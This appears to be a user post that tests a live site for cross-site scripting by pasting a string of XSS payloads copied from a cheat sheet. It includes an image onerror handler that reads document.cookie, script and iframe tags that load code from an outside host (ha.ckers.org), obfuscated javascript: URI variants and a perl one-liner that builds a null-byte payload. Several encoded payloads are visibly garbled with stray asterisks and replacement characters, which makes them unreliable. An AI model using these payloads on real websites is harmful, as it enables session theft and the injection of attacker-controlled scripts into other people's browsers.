Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript
:alert("XSS"
>
Yet again
<IMG SRC=`javascript
:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript
:alert(String.fromCharCode(88,8*,8*))>
Differnet encodings: should output alert(xss) or whatever
<IMG SRC=javascript
:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6� 058�*7�*08�*0*�**4�**6(�**X**� ***>
<IMG SRC=j*v***r*pt&#x*A*lert('X& #x5**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>